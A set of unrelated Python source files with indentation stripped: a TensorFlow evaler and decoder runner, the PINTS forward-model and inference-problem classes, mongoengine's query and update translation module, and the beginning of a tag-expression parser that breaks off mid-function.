if not FLAGS.evaler_in_same_address_as_controller:
self._checkpointer.RestoreFromPath(sess, path)
global_step = sess.run(py_utils.GetGlobalStep())
# Save any additional information to disk before evaluation.
if self._export:
self._task.Export(path)
# Check after how many steps checkpoint got saved.
# And decide whether to run an evaluation.
if global_step < self._task.params.eval.start_eval_after:
return
if self._task.input.params.resettable:
tf.logging.info('Resetting input_generator.')
self._task.input_generator.Reset(sess)
metrics_dict = {
name: metrics.AverageMetric() for name in self._task.eval_metrics
}
num_samples_metric = metrics_dict['num_samples_in_batch']
samples_per_summary = self._task.params.eval.samples_per_summary
if samples_per_summary == 0:
assert self._task.input.params.resettable
while samples_per_summary == 0 or (num_samples_metric.total_value <
samples_per_summary):
try:
is_first_loop = num_samples_metric.total_value == 0
# NOTE: We intentionally do not let FProp generate scalar summaries by
# default, because evaler calls FProp multiple times for each
# checkpoint. Multiple summaries at the same step is often confusing.
# Instead, models should update eval_metrics and generate aggregate
# summaries. Other types of summaries (images, audio etc.) will be
# generated for the first eval batch.
if self._summary_op is not None and is_first_loop:
ans, summaries = sess.run([self._task.eval_metrics, self._summary_op])
summaries = self._RemoveScalarSummaries(summaries)
# Add non-scalar summaries only for the first batch of data.
self._summary_writer.add_summary(summaries, global_step)
self._summary_writer.flush()
else:
ans = sess.run(self._task.eval_metrics)
for name, (value, weight) in ans.items():
metrics_dict[name].Update(value, weight)
tf.logging.info('Total examples done: %d/%d',
num_samples_metric.total_value, samples_per_summary)
except tf.errors.OutOfRangeError:
if not self._task.input.params.resettable:
raise
break
# Replace average values with total values for certain metrics.
if 'num_predictions' in metrics_dict:
metrics_dict['num_predictions'].total_weight = 1.0
if 'num_words' in metrics_dict:
metrics_dict['num_words'].total_weight = 1.0
self._RunTF2SummaryOps(sess)
summaries = {k: v.Summary(k) for k, v in metrics_dict.items()}
summaries['total_samples'] = metrics.CreateScalarSummary(
'total_samples', num_samples_metric.total_value)
# When we have evaluated so many samples, generate a summary.
self._WriteSummaries(
self._summary_writer,
os.path.basename(self._eval_dir),
global_step,
summaries,
text_filename=os.path.join(self._eval_dir,
'score-{:08d}.txt'.format(global_step)))
# Get merged summaries for input data stats logged by the tasks's input
# generator and write summaries for the stats.
if self._task.input.merged_input_data_summary_op is not None:
input_stats_summary_str = sess.run(
self._task.input.merged_input_data_summary_op)
self._WriteInputDataStatSummaries(input_stats_summary_str, global_step)
if self._should_report_metrics:
tf.logging.info('Reporting eval measure for step %d.' % global_step)
self._trial.ReportEvalMeasure(global_step, metrics_dict, path)
def GetDecoderDir(logdir, decoder_type, model_task_name):
if model_task_name:
decoder_dir = '%s_%s' % (decoder_type, model_task_name)
else:
decoder_dir = decoder_type
return os.path.join(logdir, decoder_dir)
def _GetCheckpointIdForDecodeOut(ckpt_id_from_file, global_step):
"""Retrieve the checkpoint id for the decoder out file.
Compares the checkpoint id found in the checkpoint file name to global
step. If they diverge, uses the retrieved id and prints a warning.
Args:
ckpt_id_from_file: Checkpoint Id from the checkpoint file path.
global_step: int specifying the global step of the model.
Returns:
Checkpoint id as int.
"""
tf.logging.info('Loaded checkpoint is at global step: %d', global_step)
tf.logging.info('Checkpoint id according to checkpoint path: %d',
ckpt_id_from_file)
if global_step != ckpt_id_from_file:
tf.logging.warning(
'Checkpoint id %d != global step %d. '
'Will use checkpoint id from checkpoint file for '
'writing decoder output.', ckpt_id_from_file, global_step)
return ckpt_id_from_file
class Decoder(base_runner.BaseRunner):
"""Decoder."""
def __init__(self, decoder_type, *args, **kwargs):
super().__init__(*args, **kwargs)
self._job_name = 'decoder_' + decoder_type
self.params.cluster.do_eval = True
self._cluster = cluster_factory.Cluster(self.params.cluster)
self._decoder_dir = GetDecoderDir(self._logdir, self._job_name,
self._model_task_name)
tf.io.gfile.makedirs(self._decoder_dir)
self._decode_path = None
# Multitask params doesn't have 'task'.
if 'task' in self.params:
self._decode_path = checkpointer.GetSpecificCheckpoint(
self.params.task.eval.load_checkpoint_from)
self._should_report_metrics = self._job_name.startswith(
self._cluster.reporting_job)
with self._graph.as_default(), tf.container(self._container_id):
self._summary_writer = self._CreateSummaryWriter(self._decoder_dir)
self._CreateTF2SummaryWriter(self._decoder_dir)
with self._cluster, tf.device(
self._cluster.GetPlacer()), self._TF2SummaryContext():
self._model = self.params.Instantiate()
self._params = self._model.params
self._task = self._model.GetTask(self._model_task_name)
# Note, different graphs are being constructed for different model
# tasks, which may result in different node names being chosen.
# Obviously, variable names has to be stay the same between train and
# decode.
input_batch, self._dec_output = self._model.ConstructDecodeGraph(
self._model_task_name)
for key in self._task.input_generator.GetCpuPassthroughKeys():
if key in input_batch:
if key in self._dec_output:
tf.logging.warning(f'Key {key} already present in decode output. '
f'Not adding from input batch.')
else:
self._dec_output[key] = input_batch[key]
self._summary_op = tf.summary.merge_all()
self._checkpointer = self._CreateCheckpointer(self._train_dir,
self._model)
self._CreateTF2SummaryOps()
self._initialize_tables = tf.tables_initializer()
self._initialize_local_vars = tf.local_variables_initializer()
# No queues are allowed for decoder models.
self.enqueue_ops = tf.get_collection(py_utils.ENQUEUE_OPS)
assert not self.enqueue_ops
# Saves the graph def.
self._WriteToLog(self.params.ToText(), self._decoder_dir, 'params.txt')
if self.params.cluster.task == 0:
tf.io.write_graph(self._graph.as_graph_def(), self._decoder_dir,
'%s.pbtxt' % self._job_name)
def Start(self):
super().Start()
self._RunLoop(self._job_name, self._Loop)
def _Loop(self):
with tf.container(self._container_id), self._cluster, self._GetSession(
inline=False) as sess:
# This initializes local tables
sess.run(self._initialize_tables)
# This initializes local variables.
sess.run(self._initialize_local_vars)
self._InitializeTF2SummaryWriter(sess)
self._task.input.Initialize(sess)
if self._decode_path:
self.DecodeCheckpoint(sess, self._decode_path)
py_utils.UpdateProcessedCheckpoints(self._decoder_dir,
self._decode_path)
elif self._task.params.eval.decode_all_checkpoints:
self._RunOnAllCheckpoints(sess, self.DecodeCheckpoint,
self._decoder_dir)
else:
self._RunOnLatestCheckpoints(sess, self.DecodeCheckpoint,
self._decoder_dir)
if self._should_report_metrics:
tf.logging.info('Reporting trial done.')
self._trial.ReportDone()
tf.logging.info('Decoding finished.')
@classmethod
def GetDecodeOutPath(cls, decoder_dir, checkpoint_id):
"""Gets the path to decode out file."""
out_dir = cls._GetTtlDir(decoder_dir, duration='7d')
return os.path.join(out_dir, 'decoder_out_%09d' % checkpoint_id)
def GetCkptIdFromFile(self, checkpoint_path):
return int(re.sub(r'.*ckpt-', '', checkpoint_path))
def _RemoveScalarSummaries(self, summaries):
proto = tf.Summary()
proto.ParseFromString(summaries)
for i, value in enumerate(proto.value):
if value.WhichOneof('value') == 'simple_value':
del proto.value[i]
return proto.SerializeToString()
def DecodeCheckpoint(self, sess, checkpoint_path):
"""Decodes `samples_per_summary` examples using `checkpoint_path`."""
p = self._task.params
ckpt_id_from_file = self.GetCkptIdFromFile(checkpoint_path)
if ckpt_id_from_file < p.eval.start_decoder_after:
return
samples_per_summary = p.eval.decoder_samples_per_summary
if samples_per_summary is None:
samples_per_summary = p.eval.samples_per_summary
if samples_per_summary == 0:
assert self._task.input.params.resettable
self._checkpointer.RestoreFromPath(sess, checkpoint_path)
global_step = sess.run(py_utils.GetGlobalStep())
if self._task.input.params.resettable:
tf.logging.info('Resetting input_generator.')
self._task.input.Reset(sess)
dec_metrics = self._task.CreateDecoderMetrics()
if not dec_metrics:
tf.logging.info('Empty decoder metrics')
return
buffered_decode_out = []
num_examples_metric = dec_metrics['num_samples_in_batch']
start_time = time.time()
while samples_per_summary == 0 or (num_examples_metric.total_value <
samples_per_summary):
try:
is_first_loop = num_examples_metric.total_value == 0
tf.logging.info('Fetching dec_output.')
fetch_start = time.time()
run_options = tf.RunOptions(report_tensor_allocations_upon_oom=False)
# NOTE: We intentionally do not generate scalar summaries by
# default, because decoder is run multiple times for each
# checkpoint. Multiple summaries at the same step is often confusing.
# Instead, models should generate aggregate summaries using
# PostProcessDecodeOut. Other types of summaries (images, audio etc.)
# will be generated for the first eval batch.
if self._summary_op is not None and is_first_loop:
dec_out, summaries = sess.run([self._dec_output, self._summary_op],
options=run_options)
summaries = self._RemoveScalarSummaries(summaries)
# Add non-scalar summaries only for the first batch of data.
self._summary_writer.add_summary(summaries, global_step)
self._summary_writer.flush()
else:
dec_out = sess.run(self._dec_output, options=run_options)
self._RunTF2SummaryOps(sess)
post_process_start = time.time()
tf.logging.info('Done fetching (%f seconds)' %
(post_process_start - fetch_start))
decode_out = self._task.PostProcessDecodeOut(dec_out, dec_metrics)
if decode_out:
if isinstance(decode_out, dict):
decode_out = decode_out.items()
if is_first_loop:
# Add summaries only for the first batch of data.
for key, value in decode_out:
if isinstance(value, tf.Summary):
tf.logging.info(f'Adding summary {key} with tags '
f'{[x.tag for x in value.value]}.')
self._summary_writer.add_summary(value, global_step)
self._summary_writer.flush()
buffered_decode_out.extend(
kv for kv in decode_out if not isinstance(kv[1], tf.Summary))
tf.logging.info(
'Total examples done: %d/%d '
'(%f seconds decode postprocess)', num_examples_metric.total_value,
samples_per_summary,
time.time() - post_process_start)
except tf.errors.OutOfRangeError:
if not self._task.input.params.resettable:
raise
break
tf.logging.info('Done decoding ckpt: %s', checkpoint_path)
summaries = {k: v.Summary(k) for k, v in dec_metrics.items()}
elapsed_secs = time.time() - start_time
example_rate = num_examples_metric.total_value / elapsed_secs
summaries['examples/sec'] = metrics.CreateScalarSummary(
'examples/sec', example_rate)
summaries['total_samples'] = metrics.CreateScalarSummary(
'total_samples', num_examples_metric.total_value)
self._WriteSummaries(
self._summary_writer,
os.path.basename(self._decoder_dir),
global_step,
summaries,
text_filename=os.path.join(self._decoder_dir,
'score-{:08d}.txt'.format(global_step)))
self._ExportMetrics(
# Metrics expects python int, but global_step is numpy.int64.
decode_checkpoint=int(global_step),
dec_metrics=dec_metrics,
example_rate=example_rate)
# global_step and the checkpoint id from the checkpoint file might be
# different. For consistency of checkpoint filename and decoder_out
# file, use the checkpoint id as derived from the checkpoint filename.
checkpoint_id = _GetCheckpointIdForDecodeOut(ckpt_id_from_file, global_step)
decode_out_path = self.GetDecodeOutPath(self._decoder_dir, checkpoint_id)
decode_finalize_args = base_model.DecodeFinalizeArgs(
decode_out_path=decode_out_path, decode_out=buffered_decode_out)
self._task.DecodeFinalize(decode_finalize_args)
if self._should_report_metrics:
tf.logging.info('Reporting eval measure for step %d.' % global_step)
self._trial.ReportEvalMeasure(global_step, dec_metrics, checkpoint_path)
def DecodeLatestCheckpoint(self, last_path=None):
"""Runs decoder on the latest checkpoint."""
with tf.container(
self._container_id), self._cluster, self._GetSession() as sess:
# This initializes local tables
sess.run(self._initialize_tables)
# This initializes local variables.
sess.run(self._initialize_local_vars)
self._task.input.Initialize(sess)
path = tf.train.latest_checkpoint(self._train_dir)
if not path:
tf.logging.info('No checkpoint available.')
return
elif path == last_path:
tf.logging.info('Latest checkpoint was already decoded.')
return
self.DecodeCheckpoint(sess, path)
|
|
#
# Core modules and methods
#
# This file is part of PINTS (https://github.com/pints-team/pints/) which is
# released under the BSD 3-clause license. See accompanying LICENSE.md for
# copyright notice and full license details.
#
import numpy as np
import pints
class ForwardModel(object):
"""
Defines an interface for user-supplied forward models.
Classes extending ``ForwardModel`` can implement the required methods
directly in Python or interface with other languages (for example via
Python wrappers around C code).
"""
def __init__(self):
super(ForwardModel, self).__init__()
def n_parameters(self):
"""
Returns the dimension of the parameter space.
"""
raise NotImplementedError
def simulate(self, parameters, times):
"""
Runs a forward simulation with the given ``parameters`` and returns a
time-series with data points corresponding to the given ``times``.
Returns a sequence of length ``n_times`` (for single output problems)
or a NumPy array of shape ``(n_times, n_outputs)`` (for multi-output
problems), representing the values of the model at the given ``times``.
Parameters
----------
parameters
An ordered sequence of parameter values.
times
The times at which to evaluate. Must be an ordered sequence,
without duplicates, and without negative values.
All simulations are started at time 0, regardless of whether this
value appears in ``times``.
"""
raise NotImplementedError
def n_outputs(self):
"""
Returns the number of outputs this model has. The default is 1.
"""
return 1
class ForwardModelS1(ForwardModel):
"""
Defines an interface for user-supplied forward models which can calculate
the first-order derivative of the simulated values with respect to the
parameters.
Extends :class:`pints.ForwardModel`.
"""
def __init__(self):
super(ForwardModelS1, self).__init__()
def simulateS1(self, parameters, times):
"""
Runs a forward simulation with the given ``parameters`` and returns a
time-series with data points corresponding to the given ``times``,
along with the sensitivities of the forward simulation with respect to
the parameters.
Parameters
----------
parameters
An ordered list of parameter values.
times
The times at which to evaluate. Must be an ordered sequence,
without duplicates, and without negative values.
All simulations are started at time 0, regardless of whether this
value appears in ``times``.
Returns
-------
y
The simulated values, as a sequence of ``n_times`` values, or
a NumPy array of shape ``(n_times, n_outputs)``.
y'
The corresponding derivatives, as a NumPy array of shape
``(n_times, n_parameters)`` or an array of shape
``(n_times, n_outputs, n_parameters)``.
"""
raise NotImplementedError
class SingleOutputProblem(object):
"""
Represents an inference problem where a model is fit to a single time
series, such as measured from a system with a single output.
Parameters
----------
model
A model or model wrapper extending :class:`ForwardModel`.
times
A sequence of points in time. Must be non-negative and increasing.
values
A sequence of scalar output values, measured at the times in ``times``.
"""
def __init__(self, model, times, values):
# Check model
self._model = model
if model.n_outputs() != 1:
raise ValueError(
'Only single-output models can be used for a'
' SingleOutputProblem.')
# Check times, copy so that they can no longer be changed and set them
# to read-only
self._times = pints.vector(times)
if np.any(self._times < 0):
raise ValueError('Times can not be negative.')
if np.any(self._times[:-1] >= self._times[1:]):
raise ValueError('Times must be increasing.')
# Check values, copy so that they can no longer be changed
self._values = pints.vector(values)
# Check dimensions
self._n_parameters = int(model.n_parameters())
self._n_times = len(self._times)
# Check times and values array have write shape
if len(self._values) != self._n_times:
raise ValueError(
'Times and values arrays must have same length.')
def evaluate(self, parameters):
"""
Runs a simulation using the given parameters, returning the simulated
values as a NumPy array of shape ``(n_times,)``.
"""
y = np.asarray(self._model.simulate(parameters, self._times))
return y.reshape((self._n_times,))
def evaluateS1(self, parameters):
"""
Runs a simulation with first-order sensitivity calculation, returning
the simulated values and derivatives.
The returned data is a tuple of NumPy arrays ``(y, y')``, where ``y``
has shape ``(self._n_times,)`` while ``y'`` has shape
``(n_times, n_parameters)``.
*This method only works for problems with a model that implements the
:class:`ForwardModelS1` interface.*
"""
y, dy = self._model.simulateS1(parameters, self._times)
return (
np.asarray(y).reshape((self._n_times,)),
np.asarray(dy).reshape((self._n_times, self._n_parameters))
)
def n_outputs(self):
"""
Returns the number of outputs for this problem (always 1).
"""
return 1
def n_parameters(self):
"""
Returns the dimension (the number of parameters) of this problem.
"""
return self._n_parameters
def n_times(self):
"""
Returns the number of sampling points, i.e. the length of the vectors
returned by :meth:`times()` and :meth:`values()`.
"""
return self._n_times
def times(self):
"""
Returns this problem's times.
The returned value is a read-only NumPy array of shape ``(n_times, )``,
where ``n_times`` is the number of time points.
"""
return self._times
def values(self):
"""
Returns this problem's values.
The returned value is a read-only NumPy array of shape ``(n_times, )``,
where ``n_times`` is the number of time points.
"""
return self._values
class MultiOutputProblem(object):
"""
Represents an inference problem where a model is fit to a multi-valued time
series, such as measured from a system with multiple outputs.
Parameters
----------
model
A model or model wrapper extending :class:`ForwardModel`.
times
A sequence of points in time. Must be non-negative and non-decreasing.
values
A sequence of multi-valued measurements. Must have shape
``(n_times, n_outputs)``, where ``n_times`` is the number of points in
``times`` and ``n_outputs`` is the number of outputs in the model.
"""
def __init__(self, model, times, values):
# Check model
self._model = model
# Check times, copy so that they can no longer be changed and set them
# to read-only
self._times = pints.vector(times)
if np.any(self._times < 0):
raise ValueError('Times cannot be negative.')
if np.any(self._times[:-1] > self._times[1:]):
raise ValueError('Times must be non-decreasing.')
# Check values, copy so that they can no longer be changed
self._values = pints.matrix2d(values)
# Check dimensions
self._n_parameters = int(model.n_parameters())
self._n_outputs = int(model.n_outputs())
self._n_times = len(self._times)
# Check for correct shape
if self._values.shape != (self._n_times, self._n_outputs):
raise ValueError(
'Values array must have shape `(n_times, n_outputs)`.')
def evaluate(self, parameters):
"""
Runs a simulation using the given parameters, returning the simulated
values.
The returned data is a NumPy array with shape ``(n_times, n_outputs)``.
"""
y = np.asarray(self._model.simulate(parameters, self._times))
return y.reshape(self._n_times, self._n_outputs)
def evaluateS1(self, parameters):
"""
Runs a simulation using the given parameters, returning the simulated
values.
The returned data is a tuple of NumPy arrays ``(y, y')``, where ``y``
has shape ``(n_times, n_outputs)``, while ``y'`` has shape
``(n_times, n_outputs, n_parameters)``.
*This method only works for problems whose model implements the
:class:`ForwardModelS1` interface.*
"""
y, dy = self._model.simulateS1(parameters, self._times)
return (
np.asarray(y).reshape(self._n_times, self._n_outputs),
np.asarray(dy).reshape(
self._n_times, self._n_outputs, self._n_parameters)
)
def n_outputs(self):
"""
Returns the number of outputs for this problem.
"""
return self._n_outputs
def n_parameters(self):
"""
Returns the dimension (the number of parameters) of this problem.
"""
return self._n_parameters
def n_times(self):
"""
Returns the number of sampling points, i.e. the length of the vectors
returned by :meth:`times()` and :meth:`values()`.
"""
return self._n_times
def times(self):
"""
Returns this problem's times.
The returned value is a read-only NumPy array of shape
``(n_times, n_outputs)``, where ``n_times`` is the number of time
points and ``n_outputs`` is the number of outputs.
"""
return self._times
def values(self):
"""
Returns this problem's values.
The returned value is a read-only NumPy array of shape
``(n_times, n_outputs)``, where ``n_times`` is the number of time
points and ``n_outputs`` is the number of outputs.
"""
return self._values
class TunableMethod(object):
"""
Defines an interface for a numerical method with a given number of
hyper-parameters.
Each optimiser or sampler method implemented in pints has a number of
parameters which alters its behaviour, which can be called
"hyper-parameters". The optimiser/sampler method will provide member
functions to set each of these hyper-parameters individually. In contrast,
this interface provides a generic way to set the hyper-parameters, which
allows the user to, for example, use an optimiser to tune the
hyper-parameters of the method.
Note that :meth:`set_hyper_parameters` takes an array of parameters, which
might be of the same type (e.g. a NumPy array). So derived classes should
not raise any errors if individual hyper parameters are set using the wrong
type (e.g. float rather than int), but should instead implicitly convert
the argument to the correct type.
"""
def n_hyper_parameters(self):
"""
Returns the number of hyper-parameters for this method (see
:class:`TunableMethod`).
"""
return 0
def set_hyper_parameters(self, x):
"""
Sets the hyper-parameters for the method with the given vector of
values (see :class:`TunableMethod`).
Parameters
----------
x
An array of length ``n_hyper_parameters`` used to set the
hyper-parameters.
"""
pass
|
|
from collections import defaultdict
import pymongo
from bson import SON
from mongoengine.base.fields import UPDATE_OPERATORS
from mongoengine.connection import get_connection
from mongoengine.common import _import_class
from mongoengine.errors import InvalidQueryError
from mongoengine.python_support import IS_PYMONGO_3
__all__ = ('query', 'update')
COMPARISON_OPERATORS = ('ne', 'gt', 'gte', 'lt', 'lte', 'in', 'nin', 'mod',
'all', 'size', 'exists', 'not', 'elemMatch', 'type')
GEO_OPERATORS = ('within_distance', 'within_spherical_distance',
'within_box', 'within_polygon', 'near', 'near_sphere',
'max_distance', 'min_distance', 'geo_within', 'geo_within_box',
'geo_within_polygon', 'geo_within_center',
'geo_within_sphere', 'geo_intersects')
STRING_OPERATORS = ('contains', 'icontains', 'startswith',
'istartswith', 'endswith', 'iendswith',
'exact', 'iexact')
CUSTOM_OPERATORS = ('match',)
MATCH_OPERATORS = (COMPARISON_OPERATORS + GEO_OPERATORS +
STRING_OPERATORS + CUSTOM_OPERATORS)
def query(_doc_cls=None, **kwargs):
"""Transform a query from Django-style format to Mongo format.
"""
mongo_query = {}
merge_query = defaultdict(list)
for key, value in sorted(kwargs.items()):
if key == "__raw__":
mongo_query.update(value)
continue
parts = key.rsplit('__')
indices = [(i, p) for i, p in enumerate(parts) if p.isdigit()]
parts = [part for part in parts if not part.isdigit()]
# Check for an operator and transform to mongo-style if there is
op = None
if len(parts) > 1 and parts[-1] in MATCH_OPERATORS:
op = parts.pop()
# Allw to escape operator-like field name by __
if len(parts) > 1 and parts[-1] == "":
parts.pop()
negate = False
if len(parts) > 1 and parts[-1] == 'not':
parts.pop()
negate = True
if _doc_cls:
# Switch field names to proper names [set in Field(name='foo')]
try:
fields = _doc_cls._lookup_field(parts)
except Exception, e:
raise InvalidQueryError(e)
parts = []
CachedReferenceField = _import_class('CachedReferenceField')
cleaned_fields = []
for field in fields:
append_field = True
if isinstance(field, basestring):
parts.append(field)
append_field = False
# is last and CachedReferenceField
elif isinstance(field, CachedReferenceField) and fields[-1] == field:
parts.append('%s._id' % field.db_field)
else:
parts.append(field.db_field)
if append_field:
cleaned_fields.append(field)
# Convert value to proper value
field = cleaned_fields[-1]
singular_ops = [None, 'ne', 'gt', 'gte', 'lt', 'lte', 'not']
singular_ops += STRING_OPERATORS
if op in singular_ops:
if isinstance(field, basestring):
if (op in STRING_OPERATORS and
isinstance(value, basestring)):
StringField = _import_class('StringField')
value = StringField.prepare_query_value(op, value)
else:
value = field
else:
value = field.prepare_query_value(op, value)
if isinstance(field, CachedReferenceField) and value:
value = value['_id']
elif op in ('in', 'nin', 'all', 'near') and not isinstance(value, dict):
# 'in', 'nin' and 'all' require a list of values
value = [field.prepare_query_value(op, v) for v in value]
# if op and op not in COMPARISON_OPERATORS:
if op:
if op in GEO_OPERATORS:
value = _geo_operator(field, op, value)
elif op in ('match', 'elemMatch'):
ListField = _import_class('ListField')
EmbeddedDocumentField = _import_class('EmbeddedDocumentField')
if (isinstance(value, dict) and isinstance(field, ListField) and
isinstance(field.field, EmbeddedDocumentField)):
value = query(field.field.document_type, **value)
else:
value = field.prepare_query_value(op, value)
value = {"$elemMatch": value}
elif op in CUSTOM_OPERATORS:
NotImplementedError("Custom method '%s' has not "
"been implemented" % op)
elif op not in STRING_OPERATORS:
value = {'$' + op: value}
if negate:
value = {'$not': value}
for i, part in indices:
parts.insert(i, part)
key = '.'.join(parts)
if op is None or key not in mongo_query:
mongo_query[key] = value
elif key in mongo_query:
if key in mongo_query and isinstance(mongo_query[key], dict):
mongo_query[key].update(value)
# $max/minDistance needs to come last - convert to SON
value_dict = mongo_query[key]
if ('$maxDistance' in value_dict or '$minDistance' in value_dict) and \
('$near' in value_dict or '$nearSphere' in value_dict):
value_son = SON()
for k, v in value_dict.iteritems():
if k == '$maxDistance' or k == '$minDistance':
continue
value_son[k] = v
# Required for MongoDB >= 2.6, may fail when combining
# PyMongo 3+ and MongoDB < 2.6
near_embedded = False
for near_op in ('$near', '$nearSphere'):
if isinstance(value_dict.get(near_op), dict) and (
IS_PYMONGO_3 or get_connection().max_wire_version > 1):
value_son[near_op] = SON(value_son[near_op])
if '$maxDistance' in value_dict:
value_son[near_op][
'$maxDistance'] = value_dict['$maxDistance']
if '$minDistance' in value_dict:
value_son[near_op][
'$minDistance'] = value_dict['$minDistance']
near_embedded = True
if not near_embedded:
if '$maxDistance' in value_dict:
value_son['$maxDistance'] = value_dict['$maxDistance']
if '$minDistance' in value_dict:
value_son['$minDistance'] = value_dict['$minDistance']
mongo_query[key] = value_son
else:
# Store for manually merging later
merge_query[key].append(value)
# The queryset has been filter in such a way we must manually merge
for k, v in merge_query.items():
merge_query[k].append(mongo_query[k])
del mongo_query[k]
if isinstance(v, list):
value = [{k: val} for val in v]
if '$and' in mongo_query.keys():
mongo_query['$and'].extend(value)
else:
mongo_query['$and'] = value
return mongo_query
def update(_doc_cls=None, **update):
"""Transform an update spec from Django-style format to Mongo format.
"""
mongo_update = {}
for key, value in update.items():
if key == "__raw__":
mongo_update.update(value)
continue
parts = key.split('__')
# if there is no operator, default to "set"
if len(parts) < 3 and parts[0] not in UPDATE_OPERATORS:
parts.insert(0, 'set')
# Check for an operator and transform to mongo-style if there is
op = None
if parts[0] in UPDATE_OPERATORS:
op = parts.pop(0)
# Convert Pythonic names to Mongo equivalents
if op in ('push_all', 'pull_all'):
op = op.replace('_all', 'All')
elif op == 'dec':
# Support decrement by flipping a positive value's sign
# and using 'inc'
op = 'inc'
if value > 0:
value = -value
elif op == 'add_to_set':
op = 'addToSet'
elif op == 'set_on_insert':
op = "setOnInsert"
match = None
if parts[-1] in COMPARISON_OPERATORS:
match = parts.pop()
if _doc_cls:
# Switch field names to proper names [set in Field(name='foo')]
try:
fields = _doc_cls._lookup_field(parts)
except Exception, e:
raise InvalidQueryError(e)
parts = []
cleaned_fields = []
appended_sub_field = False
for field in fields:
append_field = True
if isinstance(field, basestring):
# Convert the S operator to $
if field == 'S':
field = '$'
parts.append(field)
append_field = False
else:
parts.append(field.db_field)
if append_field:
appended_sub_field = False
cleaned_fields.append(field)
if hasattr(field, 'field'):
cleaned_fields.append(field.field)
appended_sub_field = True
# Convert value to proper value
if appended_sub_field:
field = cleaned_fields[-2]
else:
field = cleaned_fields[-1]
GeoJsonBaseField = _import_class("GeoJsonBaseField")
if isinstance(field, GeoJsonBaseField):
value = field.to_mongo(value)
if op in (None, 'set', 'push', 'pull'):
if field.required or value is not None:
value = field.prepare_query_value(op, value)
elif op in ('pushAll', 'pullAll'):
value = [field.prepare_query_value(op, v) for v in value]
elif op in ('addToSet', 'setOnInsert'):
if isinstance(value, (list, tuple, set)):
value = [field.prepare_query_value(op, v) for v in value]
elif field.required or value is not None:
value = field.prepare_query_value(op, value)
elif op == "unset":
value = 1
if match:
match = '$' + match
value = {match: value}
key = '.'.join(parts)
if not op:
raise InvalidQueryError("Updates must supply an operation "
"eg: set__FIELD=value")
if 'pull' in op and '.' in key:
# Dot operators don't work on pull operations
# unless they point to a list field
# Otherwise it uses nested dict syntax
if op == 'pullAll':
raise InvalidQueryError("pullAll operations only support "
"a single field depth")
# Look for the last list field and use dot notation until there
field_classes = [c.__class__ for c in cleaned_fields]
field_classes.reverse()
ListField = _import_class('ListField')
if ListField in field_classes:
# Join all fields via dot notation to the last ListField
# Then process as normal
last_listField = len(
cleaned_fields) - field_classes.index(ListField)
key = ".".join(parts[:last_listField])
parts = parts[last_listField:]
parts.insert(0, key)
parts.reverse()
for key in parts:
value = {key: value}
elif op == 'addToSet' and isinstance(value, list):
value = {key: {"$each": value}}
else:
value = {key: value}
key = '$' + op
if key not in mongo_update:
mongo_update[key] = value
elif key in mongo_update and isinstance(mongo_update[key], dict):
mongo_update[key].update(value)
return mongo_update
def _geo_operator(field, op, value):
"""Helper to return the query for a given geo query"""
if op == "max_distance":
value = {'$maxDistance': value}
elif op == "min_distance":
value = {'$minDistance': value}
elif field._geo_index == pymongo.GEO2D:
if op == "within_distance":
value = {'$within': {'$center': value}}
elif op == "within_spherical_distance":
value = {'$within': {'$centerSphere': value}}
elif op == "within_polygon":
value = {'$within': {'$polygon': value}}
elif op == "near":
value = {'$near': value}
elif op == "near_sphere":
value = {'$nearSphere': value}
elif op == 'within_box':
value = {'$within': {'$box': value}}
else:
raise NotImplementedError("Geo method '%s' has not "
"been implemented for a GeoPointField" % op)
else:
if op == "geo_within":
value = {"$geoWithin": _infer_geometry(value)}
elif op == "geo_within_box":
value = {"$geoWithin": {"$box": value}}
elif op == "geo_within_polygon":
value = {"$geoWithin": {"$polygon": value}}
elif op == "geo_within_center":
value = {"$geoWithin": {"$center": value}}
elif op == "geo_within_sphere":
value = {"$geoWithin": {"$centerSphere": value}}
elif op == "geo_intersects":
value = {"$geoIntersects": _infer_geometry(value)}
elif op == "near":
value = {'$near': _infer_geometry(value)}
else:
raise NotImplementedError("Geo method '%s' has not "
"been implemented for a %s " % (op, field._name))
return value
def _infer_geometry(value):
"""Helper method that tries to infer the $geometry shape for a given value"""
if isinstance(value, dict):
if "$geometry" in value:
return value
elif 'coordinates' in value and 'type' in value:
return {"$geometry": value}
raise InvalidQueryError("Invalid $geometry dictionary should have "
"type and coordinates keys")
elif isinstance(value, (list, set)):
# TODO: shouldn't we test value[0][0][0][0] to see if it is MultiPolygon?
# TODO: should both TypeError and IndexError be alike interpreted?
try:
value[0][0][0]
return {"$geometry": {"type": "Polygon", "coordinates": value}}
except (TypeError, IndexError):
pass
try:
value[0][0]
return {"$geometry": {"type": "LineString", "coordinates": value}}
except (TypeError, IndexError):
pass
try:
value[0]
return {"$geometry": {"type": "Point", "coordinates": value}}
except (TypeError, IndexError):
pass
raise InvalidQueryError("Invalid $geometry data. Can be either a dictionary "
"or (nested) lists of coordinate(s)")
|
|
#!/usr/bin/env python
from __future__ import absolute_import, print_function, unicode_literals
import argparse
import os
import re
import sys
from xml.dom import minidom
import appdirs
import multimap
try:
from configparser import ConfigParser
except:
from ConfigParser import SafeConfigParser as ConfigParser
class TagExpression:
def __init__(self, tag):
self.tag = tag
def evaluate(self, msg_dict, stack, index):
return (index - 1, self.tag in msg_dict)
class TagEqualExpression:
def __init__(self, tag, value):
self.tag = tag
self.value = value
def evaluate(self, msg_dict, stack, index):
return (index - 1, self.value in msg_dict.getall(self.tag))
class TagNotEqualExpression:
def __init__(self, tag, value):
self.tag = tag
self.value = value
def evaluate(self, msg_dict, stack, index):
return (index - 1, self.value not in msg_dict.getall(self.tag))
class OperatorAnd:
def evaluate(self, msg_dict, stack, index):
index -= 1
index, value1 = stack[index].evaluate(msg_dict, stack, index)
index, value2 = stack[index].evaluate(msg_dict, stack, index)
return (index, value1 and value2)
class OperatorOr:
def evaluate(self, msg_dict, stack, index):
index -= 1
index, value1 = stack[index].evaluate(msg_dict, stack, index)
index, value2 = stack[index].evaluate(msg_dict, stack, index)
return (index, value1 or value2)
class OperatorNot:
def evaluate(self, msg_dict, stack, index):
index -= 1
index, value = stack[index].evaluate(msg_dict, stack, index)
return (index, not value)
def parse_expression(expression, stack, index):
'''
expression has the following syntax:
expr = and_expr
| and_expr '|' expr
and_expr = simple_expr
| simple_expr '&' and_expr
simple_expr = tag
| tag '=' value
| tag '!=' value
| '(' expr ')'
| '!' simple_expr
'''
index = parse_and_expression(expression, stack, index)
while index < len(expression) and expression[index] == "|":
index = parse_and_expression(expression, stack, index + 1)
stack.append(OperatorOr())
return index
def parse_and_expression(expression, stack, index):
index = parse_simple_expression(expression, stack, index)
